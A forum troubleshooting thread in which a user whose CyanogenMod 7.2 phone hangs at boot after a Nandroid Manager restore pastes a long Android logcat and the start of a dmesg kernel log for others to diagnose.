Hmmmm. That's very strange. Do you know how to do a logcat to a text file? If so do one and capture it at boot and we will see if it gives us an error
Sent from my Nexus 7 using Tapatalk 4
heavy_metal_man said:
Hmmmm. That's very strange. Do you know how to do a logcat to a text file? If so do one and capture it at boot and we will see if it gives us an error Sent from my Nexus 7 using Tapatalk 4
Okay, I had taken a nandroid backup using CWM 5.0.2.8 to be on the safe side before trying to restore the backup via Nandroid manager. So when the restore process via Nandroid manager again ended up stuck on the bootscreen, I wiped everything and took the nandroid restore and it was successful. WTH is going on. Seriously, I am clueless
Okay, capture it using adb or CatLog?
optimusodd said:
Okay, I had taken a nandroid backup using CWM 5.0.2.8 to be on the safe side before trying to restore the backup via Nandroid manager. So when the restore process via Nandroid manager again ended up stuck on the bootscreen, I wiped everything and took the nandroid restore and it was successful. WTH is going on. Seriously, I am clueless
OK so now you have the rom installed with the correct data restored? That's a plus. Not sure how this has come about though
Sent from my Nexus 7 using Tapatalk 4
heavy_metal_man said:
OK so now you have the rom installed with the correct data restored? That's a plus. Not sure how this has come about though Sent from my Nexus 7 using Tapatalk 4
Nope, not the one I want to restore. It's the restoration of the nandroid backup taken of clean CM 7.2, i.e. CM7.2+Gapps+Nandroid Manager.
Okay, I do a logcat.
................................EDITED..........................
Hi, I have sent you the logcats.
Here is one of the logcats
HTML:
--------- beginning of /dev/log/main
[ 12-15 19:32:52.341 100:0x64 I/cm ]
Welcome to Android 2.3.7 / CyanogenMod-7.2.0-buzz
[ 12-15 19:32:52.351 101:0x65 I/cm ]
_
[ 12-15 19:32:52.371 102:0x66 I/cm ]
__ __ _ ___ _ _ __ ___ __ _ _ _ _ __ __))
[ 12-15 19:32:52.391 103:0x67 I/cm ]
((_ \(/'((_( ((\( ((_)((_( (('((\( ((`1( ((_)((_(
[ 12-15 19:32:52.401 104:0x68 I/cm ]
)) _))
[ 12-15 19:32:52.421 105:0x69 I/cm ]
[ 12-15 19:32:52.651 119:0x77 I/mountsd ]
Checking filesystems..
[ 12-15 19:32:52.771 95:0x5f I/run-parts ]
e2fsck 1.41.12 (17-May-2010)
[ 12-15 19:32:52.801 95:0x5f I/run-parts ]
/dev/block/mmcblk0p2: clean, 84/65808 files, 53844/262912 blocks
[ 12-15 19:32:52.972 134:0x86 I/mountsd ]
/sd-ext successfully mounted
[ 12-15 19:32:53.602 169:0xa9 D/AK8973 ]
AK8973 daemon 1.3.4 Start
(Library version : 1.2.1.620)
--------- beginning of /dev/log/system
[ 12-15 19:32:53.832 160:0xa0 I/Vold ]
Vold 2.1 (the revenge) firing up
[ 12-15 19:32:53.872 160:0xa0 D/Vold ]
Volume sdcard state changing -1 (Initializing) -> 0 (No-Media)
[ 12-15 19:32:53.993 160:0xb5 D/Vold ]
USB connected
[ 12-15 19:32:54.003 160:0xb5 D/Vold ]
Volume sdcard state changing 0 (No-Media) -> 2 (Pending)
[ 12-15 19:32:54.033 160:0xb5 D/Vold ]
Volume sdcard state changing 2 (Pending) -> 1 (Idle-Unmounted)
[ 12-15 19:32:54.093 161:0xa1 I/Netd ]
Netd 1.0 starting
[ 12-15 19:32:54.213 160:0xb5 D/Vold ]
USB connected
[ 12-15 19:32:54.423 162:0xa2 I/DEBUG ]
debuggerd: Jun 15 2012 12:13:45
[ 12-15 19:32:55.744 164:0xa4 D/AndroidRuntime ]
>>>>>> AndroidRuntime START com.android.internal.os.ZygoteInit <<<<<<
[ 12-15 19:32:55.744 164:0xa4 I/AndroidRuntime ]
Heap size: -Xmx32m
[ 12-15 19:32:55.744 164:0xa4 D/AndroidRuntime ]
CheckJNI is OFF
[ 12-15 19:32:56.285 165:0xa5 I/ ]
ServiceManager: 0xad50
[ 12-15 19:32:56.305 165:0xa5 I/HTC Acoustic ]
libhtc_acoustic.so version 1.0.1.4.
[ 12-15 19:32:56.305 165:0xa5 E/HTC Acoustic ]
Fail to open /system/etc/AudioPara_ALL.csv -1.
[ 12-15 19:32:56.305 165:0xa5 I/HTC Acoustic ]
open /system/etc/AudioPara4.csv success.
[ 12-15 19:32:56.335 165:0xa5 I/HTC Acoustic ]
acoustic table version: Buzz_Generic_20100804
[ 12-15 19:32:56.365 165:0xa5 I/HTC Acoustic ]
read_audio_para_from_file success.
[ 12-15 19:32:56.365 165:0xa5 I/HTC Acoustic ]
get_audpp_filter
[ 12-15 19:32:56.365 165:0xa5 I/HTC Acoustic ]
open /system/etc/AudioFilter.csv success.
[ 12-15 19:32:56.365 165:0xa5 I/HTC Acoustic ]
ADRC Filter ADRC FLAG = ffff.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP THRESHOLD = 2550.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP SLOPE = b333.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP RMS TIME = 106.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP ATTACK[0] = 7f7d.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP ATTACK[1] = 3096.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP RELEASE[0] = 7ff7.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP RELEASE[1] = 4356.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
ADRC Filter COMP DELAY = 16.
[ 12-15 19:32:56.375 165:0xa5 I/HTC Acoustic ]
EQ flag = ffff.
[ 12-15 19:32:56.395 165:0xa5 I/HTC Acoustic ]
get_audpre_filter
[ 12-15 19:32:56.395 165:0xa5 I/HTC Acoustic ]
open /system/etc/AudioPreProcess.csv success.
[ 12-15 19:32:56.395 165:0xa5 D/AudioHardwareMSM72XX ]
mNumSndEndpoints = 80
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH HANDSET
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH SPEAKER
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH HEADSET
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH BT
[ 12-15 19:32:56.405 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH CARKIT
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH TTY_FULL
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH TTY_VCO
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH TTY_HCO
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH NO_MIC_HEADSET
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH FM_HEADSET
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH HEADSET_AND_SPEAKER
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH FM_SPEAKER
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH BT_EC_OFF
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareMSM72XX ]
BT MATCH CURRENT
[ 12-15 19:32:56.415 165:0xa5 D/AudioHardwareInterface ]
setMode(NORMAL)
[ 12-15 19:32:56.415 165:0xa5 I/AudioHardwareMSM72XX ]
Set master volume to 5.
[ 12-15 19:32:56.435 165:0xa5 I/CameraService ]
CameraService started (pid=165)
[ 12-15 19:32:56.445 165:0xd5 I/AudioFlinger ]
AudioFlinger's thread 0xf2e0 ready to run
[ 12-15 19:32:56.445 165:0xd4 D/AudioFlinger ]
setParameters(): io 1, keyvalue routing=2, tid 212, calling tid 165
[ 12-15 19:32:56.455 165:0xd5 I/AudioHardwareMSM72XX ]
Routing audio to Speakerphone
[ 12-15 19:32:56.455 165:0xd5 D/HTC Acoustic ]
msm72xx_enable_audpp: 0x0007
[ 12-15 19:32:56.465 165:0xd4 D/AudioHardwareMSM72XX ]
setVoiceVolume(1.000000)
[ 12-15 19:32:56.465 165:0xd4 I/AudioHardwareMSM72XX ]
Setting in-call volume to 5 (available range is 0 to 5)
[ 12-15 19:32:57.836 164:0xa4 I/SamplingProfilerIntegration ]
Profiler is disabled.
[ 12-15 19:32:57.906 164:0xa4 I/Zygote ]
Preloading classes...
[ 12-15 19:32:57.916 164:0xa4 E/Zygote ]
setreuid() failed. errno: 2
[ 12-15 19:32:57.926 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed 48K, 77% free 239K/1024K, external 0K/0K, paused 11ms
[ 12-15 19:32:58.137 164:0xa4 I/bluetooth_ScoSocket.cpp ]
Entry name = MY-CAR ScoTypes = 0x7f
[ 12-15 19:32:58.137 164:0xa4 I/bluetooth_ScoSocket.cpp ]
Entry name = Motorola HF850 ScoTypes = 0x7
[ 12-15 19:33:00.199 164:0xa4 D/szipinf ]
Initializing inflate state
[ 12-15 19:33:04.683 164:0xa4 D/dalvikvm ]
GC_FOR_MALLOC freed 2913K, 57% free 2209K/5123K, external 0K/0K, paused 99ms
[ 12-15 19:33:06.375 164:0xa4 D/dalvikvm ]
GC_FOR_MALLOC freed 2631K, 52% free 2488K/5123K, external 0K/0K, paused 93ms
[ 12-15 19:33:10.529 164:0xa4 I/Zygote ]
...preloaded 1829 classes in 12629ms.
[ 12-15 19:33:10.529 164:0xa4 D/Zygote ]
setreuid() error ignored, same uid.
[ 12-15 19:33:10.619 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed 891K, 48% free 2685K/5123K, external 0K/0K, paused 82ms
[ 12-15 19:33:10.619 164:0xa4 I/Zygote ]
Preload resources disabled, skipped.
[ 12-15 19:33:10.689 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed 25K, 49% free 2660K/5123K, external 0K/0K, paused 67ms
[ 12-15 19:33:10.759 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed <1K, 49% free 2660K/5123K, external 0K/0K, paused 66ms
[ 12-15 19:33:10.819 164:0xa4 D/dalvikvm ]
GC_EXPLICIT freed <1K, 49% free 2660K/5123K, external 0K/0K, paused 66ms
[ 12-15 19:33:10.839 164:0xa4 I/dalvikvm ]
System server process 222 has been created
[ 12-15 19:33:10.839 164:0xa4 I/Zygote ]
Accepting command socket connections
[ 12-15 19:33:11.239 222:0xde I/sysproc ]
Entered system_init()
[ 12-15 19:33:11.239 222:0xde I/sysproc ]
ServiceManager: 0x817f8
[ 12-15 19:33:11.249 222:0xde I/SurfaceFlinger ]
SurfaceFlinger is starting
[ 12-15 19:33:11.249 222:0xde I/SurfaceFlinger ]
dithering enabled
[ 12-15 19:33:11.249 222:0xe6 I/SurfaceFlinger ]
SurfaceFlinger's main thread ready to run. Initializing graphics H/W...
[ 12-15 19:33:11.269 222:0xe6 I/gralloc ]
using (fd=27)
id = msmfb
xres = 240 px
yres = 320 px
xres_virtual = 240 px
yres_virtual = 640 px
bpp = 16
r = 11:5
g = 5:6
b = 0:5
[ 12-15 19:33:11.269 222:0xe6 I/gralloc ]
width = 49 mm (124.408165 dpi)
height = 65 mm (125.046150 dpi)
refresh rate = 60.00 Hz
[ 12-15 19:33:11.279 222:0xe6 D/libEGL ]
egl.cfg not found, using default config
[ 12-15 19:33:11.289 222:0xe6 D/libEGL ]
loaded /system/lib/egl/libGLES_android.so
[ 12-15 19:33:11.309 222:0xe6 I/SurfaceFlinger ]
EGL informations:
[ 12-15 19:33:11.309 222:0xe6 I/SurfaceFlinger ]
# of configs : 8
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
vendor : Android
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
version : 1.4 Android META-EGL
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
extensions: EGL_KHR_image EGL_KHR_image_base EGL_KHR_image_pixmap EGL_KHR_gl_texture_2D_image EGL_KHR_gl_texture_cubemap_image EGL_KHR_gl_renderbuffer_image EGL_ANDROID_image_native_buffer EGL_ANDROID_swap_rectangle EGL_ANDROID_get_render_buffer
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
Client API: OpenGL ES
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
EGLSurface: 5-6-5-0, config=0x0
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
OpenGL informations:
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
vendor : Android
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
renderer : Android PixelFlinger 1.4
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
version : OpenGL ES-CM 1.0
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
extensions: GL_OES_byte_coordinates GL_OES_fixed_point GL_OES_single_precision GL_OES_read_format GL_OES_compressed_paletted_texture GL_OES_draw_texture GL_OES_matrix_get GL_OES_query_matrix GL_OES_EGL_image GL_OES_compressed_ETC1_RGB8_texture GL_ARB_texture_compression GL_ARB_texture_non_power_of_two GL_ANDROID_user_clip_plane GL_ANDROID_vertex_buffer_object GL_ANDROID_generate_mipmap
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
GL_MAX_TEXTURE_SIZE = 4096
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
GL_MAX_VIEWPORT_DIMS = 4096
[ 12-15 19:33:11.319 222:0xe6 I/SurfaceFlinger ]
flags = 000c0000
[ 12-15 19:33:11.330 222:0xde D/SensorService ]
nuSensorService starting...
[ 12-15 19:33:11.340 169:0xa9 D/AK8973 ]
Compass Start
[ 12-15 19:33:11.390 222:0xde I/SensorService ]
BMA150 3-axis Accelerometer
[ 12-15 19:33:11.390 222:0xde I/SensorService ]
AK8973 3-axis Magnetic field sensor
[ 12-15 19:33:11.390 222:0xde I/SensorService ]
AK8973 Orientation sensor
[ 12-15 19:33:11.390 222:0xde I/SensorService ]
CM3602 Proximity sensor
[ 12-15 19:33:11.400 222:0xde I/SensorService ]
CM3602 Light sensor
[ 12-15 19:33:11.400 222:0xde I/sysproc ]
System server: starting Android runtime.
[ 12-15 19:33:11.400 222:0xde I/sysproc ]
System server: starting Android services.
[ 12-15 19:33:11.410 222:0xeb D/SensorService ]
nuSensorService thread starting...
[ 12-15 19:33:11.420 222:0xde I/SystemServer ]
Entered the Android system server!
[ 12-15 19:33:11.440 222:0xde I/sysproc ]
System server: entering thread pool.
[ 12-15 19:33:11.440 222:0xec I/SystemServer ]
Entropy Service
[ 12-15 19:33:11.500 222:0xec I/SystemServer ]
Power Manager
[ 12-15 19:33:11.520 222:0xec I/SystemServer ]
Activity Manager
[ 12-15 19:33:11.610 222:0xed I/ActivityManager ]
Memory class: 32
[ 12-15 19:33:11.750 232:0xef D/libEGL ]
egl.cfg not found, using default config
[ 12-15 19:33:11.760 232:0xef D/libEGL ]
loaded /system/lib/egl/libGLES_android.so
[ 12-15 19:33:11.790 232:0xef W/zipro ]
Unable to open zip '/data/local/bootanimation.zip': No such file or directory
[ 12-15 19:33:12.010 232:0xef I/ARMAssembler ]
generated scanline__00000077:03010104_00008004_00000000 [ 84 ipp] (103 ins) at [0x4076c1e8:0x4076c384] in 3387451 ns
[ 12-15 19:33:12.130 222:0xed I/UsageStats ]
Deleting usage file : usage-20130830
[ 12-15 19:33:12.270 169:0xa9 D/AK8973 ]
Compass CLOSE
[ 12-15 19:33:12.421 222:0xec I/SystemServer ]
Telephony Registry
[ 12-15 19:33:12.461 222:0xec I/SystemServer ]
Package Manager
[ 12-15 19:33:12.501 167:0xa7 I/installd ]
new connection
[ 12-15 19:33:12.501 222:0xec I/Installer ]
connecting...
[ 12-15 19:33:12.771 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 156K, 47% free 3020K/5639K, external 0K/0K, paused 7ms+22ms
[ 12-15 19:33:13.602 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 314K, 47% free 3239K/6023K, external 0K/0K, paused 22ms+12ms
[ 12-15 19:33:14.733 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 537K, 49% free 3260K/6279K, external 0K/0K, paused 7ms+9ms
[ 12-15 19:33:16.014 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:16.124 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 272K, 46% free 3423K/6279K, external 0K/0K, paused 8ms+49ms
[ 12-15 19:33:16.715 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:16.785 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:16.875 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:16.965 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:17.746 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:18.136 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:18.336 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:18.446 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 164K, 42% free 3694K/6343K, external 0K/0K, paused 7ms+20ms
[ 12-15 19:33:18.466 222:0xec W/PackageParser ]
No actions in intent filter at /system/app/Bluetooth.apk Binary XML file line #132
[ 12-15 19:33:18.466 222:0xec W/PackageParser ]
No actions in intent filter at /system/app/Bluetooth.apk Binary XML file line #154
[ 12-15 19:33:18.667 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:18.847 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:19.167 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:19.387 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:19.507 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:19.888 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:20.138 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:20.388 222:0xec I/PackageManager ]
Package com.android.vending at /system/app/Vending.apk ignored: updated version 80230011 better than this 8007003
[ 12-15 19:33:20.779 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:21.600 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 275K, 42% free 3934K/6727K, external 0K/0K, paused 7ms+38ms
[ 12-15 19:33:21.630 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:21.760 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:22.811 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:23.071 222:0xec I/PackageManager ]
Package com.noshufou.android.su at /system/app/Superuser.apk ignored: updated version 46 better than this 38
[ 12-15 19:33:23.081 222:0xec D/PackageManager ]
No files in app dir /vendor/app
[ 12-15 19:33:23.231 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.nuance.swype.trial-1.apk'
[ 12-15 19:33:23.231 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.nuance.swype.trial-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:23.321 222:0xec W/PackageManager ]
Package mobi.infolife.uninstaller desires unavailable shared library com.sec.android.app.multiwindow; ignoring!
[ 12-15 19:33:23.531 222:0xec W/ResourceType ]
Failure getting entry for 0x7f09002b (t=8 e=43) in package 0 (error -75)
[ 12-15 19:33:23.992 222:0xe0 D/dalvikvm ]
GC_CONCURRENT freed 300K, 41% free 4064K/6855K, external 0K/0K, paused 20ms+27ms
[ 12-15 19:33:24.042 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.google.android.gms-2.apk'
[ 12-15 19:33:24.062 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.google.android.gms-2.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:24.132 222:0xec D/asset ]
failed to open Zip archive '/data/app/netgenius.bizcal-1.apk'
[ 12-15 19:33:24.132 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/netgenius.bizcal-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:24.352 222:0xec W/ResourceType ]
Failure getting entry for 0x7f050000 (t=4 e=0) in package 0 (error -75)
[ 12-15 19:33:24.392 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.googlecode.droidwall.free-1.apk'
[ 12-15 19:33:24.402 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.googlecode.droidwall.free-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:24.412 222:0xec D/szipinf ]
Initializing inflate state
[ 12-15 19:33:24.522 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.ruimaninfo.approtect-1.apk'
[ 12-15 19:33:24.532 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.ruimaninfo.approtect-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:24.783 222:0xec D/asset ]
failed to open Zip archive '/data/app/org.adaway-2.apk'
[ 12-15 19:33:24.793 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/org.adaway-2.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:25.003 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.modoohut.dialer.theme.dark-1.apk'
[ 12-15 19:33:25.013 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.modoohut.dialer.theme.dark-1.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
[ 12-15 19:33:25.013 222:0xec D/asset ]
failed to open Zip archive '/data/app/com.buak.Link2SD-2.apk'
[ 12-15 19:33:25.023 222:0xec W/PackageParser ]
Unable to read AndroidManifest.xml of /data/app/com.buak.Link2SD-2.apk
java.io.FileNotFoundException: AndroidManifest.xml
at android.content.res.AssetManager.openXmlAssetNative(Native Method)
at android.content.res.AssetManager.openXmlBlockAsset(AssetManager.java:521)
at android.content.res.AssetManager.openXmlResourceParser(AssetManager.java:477)
at android.content.pm.PackageParser.parsePackage(PackageParser.java:428)
at com.android.server.PackageManagerService.scanPackageLI(PackageManagerService.java:2715)
at com.android.server.PackageManagerService.scanDirLI(PackageManagerService.java:2640)
at com.android.server.PackageManagerService.<init>(PackageManagerService.java:1029)
at com.android.server.PackageManagerService.main(PackageManagerService.java:725)
at com.android.server.ServerThread.run(SystemServer.java:178)
Is there any chance someone can explain what's going wrong and help me to get it running again?
I will really appreciate that.
dmesg log
Code:
<6>[ 0.000000] Initializing cgroup subsys cpu
<5>[ 0.000000] Linux version 2.6.35.14-SympFinity+ ([email protected]) (gcc version 4.4.3 (GCC) ) #40 PREEMPT Wed May 2 14:11:03 CEST 2012
<4>[ 0.000000] CPU: ARMv6-compatible processor [4117b362] revision 2 (ARMv6TEJ), cr=00c5387f
<4>[ 0.000000] CPU: VIPT aliasing data cache, VIPT aliasing instruction cache
<4>[ 0.000000] Machine: buzz
<7>[ 0.000000] find the smi tag
<7>[ 0.000000] parse_tag_smi: smi size = 0
<7>[ 0.000000] find the hwid tag
<7>[ 0.000000] parse_tag_hwid: hwid = 0x1
<7>[ 0.000000] find the skuid tag
<7>[ 0.000000] parse_tag_skuid: hwid = 0x2490b
<7>[ 0.000000] tag_panel_parsing: panel type = 0
<7>[ 0.000000] find the engineer tag
<7>[ 0.000000] parse_tag_engineerid: 0x0
<4>[ 0.000000] Ignoring unrecognised tag 0x4d534d76
<4>[ 0.000000] Ignoring unrecognised tag 0x5441000a
<6>[ 0.000000] CAM_AWB_CAL Data size = 514 , 0x59504550, size = 2048
<4>[ 0.000000] Ignoring unrecognised tag 0x41387898
<4>[ 0.000000] BT Data size= 4, 0x43294329,d4,20,6d,94,70,72,00,00,Memory policy: ECC disabled, Data cache writeback
<7>[ 0.000000] On node 0 totalpages: 82432
<7>[ 0.000000] free_area_init_node: node 0, pgdat c052ed50, node_mem_map c06d2000
<7>[ 0.000000] Normal zone: 1156 pages used for memmap
<7>[ 0.000000] Normal zone: 0 pages reserved
<7>[ 0.000000] Normal zone: 81276 pages, LIFO batch:15
<4>[ 0.000000] buzz_init_map_io()
<4>[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 81276
<5>[ 0.000000] Kernel command line: board_buzz.disable_uart3=0 board_buzz.usb_h2w_sw=0 board_buzz.disable_sdcard=0 diag.enabled=0 board_buzz.debug_uart=0 smisize=0 userdata_sel=0 androidboot.emmc=false androidboot.baseband=3.35.20.10 androidboot.cid=11111111 androidboot.batt_poweron=good_battery androidboot.carrier=ALL androidboot.mid=PC4910000 androidboot.keycaps=qwerty androidboot.mode=normal androidboot.serialno=MB139PY05248 androidboot.bootloader=6.01.1002 zygote_oneshot=off no_console_suspend=1 console=null mtdparts=msm_nand:[email protected](misc),[email protected](recovery),[email protected](boot),[email protected]40000(system),[email protected](cache),[email protected](userdata)
<6>[ 0.000000] board_bootloader_setup: 6.01.1002
<6>[ 0.000000] board_bootloader_setup: default ENG BUILD
<6>[ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes)
<6>[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
<6>[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
<6>[ 0.000000] Memory: 210MB 112MB = 322MB total
<5>[ 0.000000] Memory: 319632k/319632k available, 10096k reserved, 0K highmem
<5>[ 0.000000] Virtual kernel memory layout:
<5>[ 0.000000] vector : 0xffff0000 - 0xffff1000 ( 4 kB)
<5>[ 0.000000] fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB)
